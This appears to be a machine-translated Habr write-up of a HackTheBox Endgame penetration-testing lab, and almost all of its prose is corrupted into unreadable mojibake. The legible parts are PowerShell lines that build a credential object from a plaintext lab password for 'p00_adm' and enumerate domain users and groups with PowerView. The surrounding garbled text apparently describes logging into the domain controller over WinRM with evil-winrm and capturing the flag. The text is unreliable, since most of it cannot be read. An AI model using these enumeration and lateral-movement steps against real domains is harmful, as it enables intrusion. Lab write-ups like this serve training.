рд░ рддреНрдпрд╕реИрд▓реЗ рд╣рд╛рдореАрд╕рдБрдЧ рддреАрди рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд╣рд░реВ рдЫрдиреН, рд╣рд╛рдореА рдбреЛрдореЗрди рдирд┐рдпрдиреНрддреНрд░рдХрдорд╛ рдЬрд╛рдиреНрдЫреМрдВред рдкрд╣рд┐рд▓реЗ рдЙрдирдХреЛ рдареЗрдЧрд╛рдирд╛ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреБрд╣реЛрд╕реНред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░рд╛рдореНрд░реЛ, рд╣рд╛рдореАрд▓реЗ рдбреЛрдореЗрди рдирд┐рдпрдиреНрддреНрд░рдХрдХреЛ IP рдареЗрдЧрд╛рдирд╛ рдкрддреНрддрд╛ рд▓рдЧрд╛рдпреМрдВред рдбреЛрдореЗрдирдХрд╛ рд╕рдмреИ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд╣рд░реВ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреБрд╣реЛрд╕реН, рд╕рд╛рдереИ рддрд┐рдиреАрд╣рд░реВрдордзреНрдпреЗ рдХреБрди рдкреНрд░рд╢рд╛рд╕рдХ рд╣реЛред рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрди PowerView.ps1ред рддреНрдпрд╕рдкрдЫрд┐ рд╣рд╛рдореА рджреБрд╖реНрдЯ-рд╡рд┐рдирд░реНрдо рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдЬрдбрд╛рди рдЧрд░реНрдиреЗрдЫреМрдВ, -s рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рдорд╛ рд▓рд┐рдкрд┐рд╕рдБрдЧ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЧрд░реНрджреИред рд░ рддреНрдпрд╕рдкрдЫрд┐ рд╣рд╛рдореА рдХреЗрд╡рд▓ PowerView рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд▓реЛрдб рдЧрд░реНрдиреЗрдЫреМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЕрдм рд╣рд╛рдореАрд╕рдБрдЧ рдпрд╕рдХреЛ рд╕рдмреИ рдкреНрд░рдХрд╛рд░реНрдпрд╣рд░реВрдорд╛ рдкрд╣реБрдБрдЪ рдЫред p00_adm рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдПрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдЬрд╕реНрддреЛ рджреЗрдЦрд┐рдиреНрдЫ, рддреНрдпрд╕реИрд▓реЗ рд╣рд╛рдореА рдЙрд╣рд╛рдБрдХреЛ рд╕рдиреНрджрд░реНрднрдорд╛ рдХрд╛рдо рдЧрд░реНрдиреЗрдЫреМрдВред рдпреЛ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рд▓рд╛рдЧрд┐ PSCcredential рд╡рд╕реНрддреБ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реМрдВред

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

рдЕрдм рд╕рдмреИ Powershell рдЖрджреЗрд╢рд╣рд░реВ рдЬрд╣рд╛рдБ рд╣рд╛рдореАрд▓реЗ рдХреНрд░реЗрдбрд┐рдЯрд╣рд░реВ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЧрд░реНрдЫреМрдВ p00_adm рдХреЛ рддрд░реНрдлрдмрд╛рдЯ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░рд┐рдиреЗрдЫред рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд╣рд░реВрдХреЛ рд╕реВрдЪреА рд░ AdminCount рд╡рд┐рд╢реЗрд╖рддрд╛ рдкреНрд░рджрд░реНрд╢рди рдЧрд░реМрдВред

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рддреНрдпрд╕реИрд▓реЗ, рд╣рд╛рдореНрд░реЛ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рд╕рд╛рдБрдЪреНрдЪреИ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЫред рдЙрд╣рд╛рдБ рдХреБрди рд╕рдореВрд╣рдорд╛ рдЖрдмрджреНрдз рд╣реБрдиреБрд╣реБрдиреНрдЫ рд╣реЗрд░реМрдВред

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореА рдЕрдиреНрддрддрдГ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рд╣реЛ рднрдиреЗрд░ рдкреБрд╖реНрдЯрд┐ рдЧрд░реНрдЫреМрдВред рдпрд╕рд▓реЗ рдпрд╕рд▓рд╛рдИ рдЯрд╛рдврд╛рдмрд╛рдЯ рдбреЛрдореЗрди рдирд┐рдпрдиреНрддреНрд░рдХрдорд╛ рд▓рдЧ рдЗрди рдЧрд░реНрдиреЗ рдЕрдзрд┐рдХрд╛рд░ рджрд┐рдиреНрдЫред рд╣рд╛рдореНрд░реЛ рд╕реБрд░реБрдЩ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ WinRM рд╕рдБрдЧ рд▓рдЧрдЗрди рдЧрд░реНрдиреЗ рдкреНрд░рдпрд╛рд╕ рдЧрд░реМрдВред рдо рджреБрд╖реНрдЯ-рд╡рд┐рдирд░реНрдо рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрд╛ reGeorg рджреНрд╡рд╛рд░рд╛ рдЬрд╛рд░реА рддреНрд░реБрдЯрд┐рд╣рд░реВ рджреНрд╡рд╛рд░рд╛ рдЕрд▓рдорд▓рдорд╛ рдкрд░реЗрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддреНрдпрд╕рдкрдЫрд┐ рд╣рд╛рдореА рдЕрд░реНрдХреЛ, рд╕рдЬрд┐рд▓реЛ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдЫреМрдВ, рд▓рд┐рдкрд┐ WinRM рдорд╛ рдЬрдбрд╛рди рдЧрд░реНрдиред рдЬрдбрд╛рди рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВ рдЦреЛрд▓реНрдиреБрд╣реЛрд╕реН рд░ рдкрд░рд┐рд╡рд░реНрддрди рдЧрд░реНрдиреБрд╣реЛрд╕реНред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореА рдЬрдбрд╛рди рдЧрд░реНрдиреЗ рдкреНрд░рдпрд╛рд╕ рдЧрд░реНрдЫреМрдВ, рд░ рд╣рд╛рдореА рдкреНрд░рдгрд╛рд▓реАрдорд╛ рдЫреМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддрд░ рдЭрдгреНрдбрд╛ рдЫреИрди ред рддреНрдпрд╕рдкрдЫрд┐ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд▓рд╛рдИ рд╣реЗрд░реНрдиреБрд╣реЛрд╕реН рд░ рдбреЗрд╕реНрдХрдЯрдкрд╣рд░реВ рдЬрд╛рдБрдЪ рдЧрд░реНрдиреБрд╣реЛрд╕реНред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

mr3ks рдорд╛ рд╣рд╛рдореАрд▓реЗ рдЭрдгреНрдбрд╛ рдлреЗрд▓рд╛ рдкрд╛рд░реНрдЫреМрдВ рд░ рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ 100% рдкреВрд░рд╛ рднрдпреЛред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдпрддрд┐ рдиреИред рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛рдХреЛ рд░реВрдкрдорд╛, рддрдкрд╛рдИрдВрд▓реЗ рдпрд╕ рд▓реЗрдЦрдмрд╛рдЯ рдХреЗрд╣реА рдирдпрд╛рдБ рд╕рд┐рдХреНрдиреБрднрдпреЛ рдХрд┐ рд░ рдпреЛ рддрдкрд╛рдИрдВрдХреЛ рд▓рд╛рдЧрд┐ рдЙрдкрдпреЛрдЧреА рдерд┐рдпреЛ рдХрд┐ рднрдиреЗрд░ рдЯрд┐рдкреНрдкрдгреА рдЧрд░реНрдиреБрд╣реЛрд╕реНред

рддрдкрд╛рдИрдВ рд╣рд╛рдореАрд▓рд╛рдИ рдорд╛ рд╕рд╛рдореЗрд▓ рд╣реБрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫ рддрд╛рд░ред рддреНрдпрд╣рд╛рдБ рддрдкрд╛рдИрдВ рд░реЛрдЪрдХ рд╕рд╛рдордЧреНрд░реА, рдорд░реНрдЬ рдкрд╛рдареНрдпрдХреНрд░рдорд╣рд░реВ, рд╕рд╛рдереИ рд╕рдлреНрдЯрд╡реЗрдпрд░ рдкрд╛рдЙрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫред рдПрдЙрдЯрд╛ рд╕рдореБрджрд╛рдп рднреЗрд▓рд╛ рдЧрд░реМрдВ рдЬрд╕рдорд╛ IT рдХреЛ рдзреЗрд░реИ рдХреНрд╖реЗрддреНрд░рд╣рд░реВ рдмреБрдЭреНрдиреЗ рдорд╛рдирд┐рд╕рд╣рд░реВ рд╣реБрдиреЗрдЫрдиреН, рддреНрдпрд╕рдкрдЫрд┐ рд╣рд╛рдореА рд╕рдзреИрдВ рдХреБрдиреИ рдкрдирд┐ IT рд░ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдореБрджреНрджрд╛рд╣рд░реВрдорд╛ рдПрдХрдЕрд░реНрдХрд╛рд▓рд╛рдИ рдорджреНрджрдд рдЧрд░реНрди рд╕рдХреНрдЫреМрдВред

рд╕реНрд░реЛрдд: www.habr.com

рдПрдХ рдЯрд┐рдкреНрдкрдгреА рдердкреНрди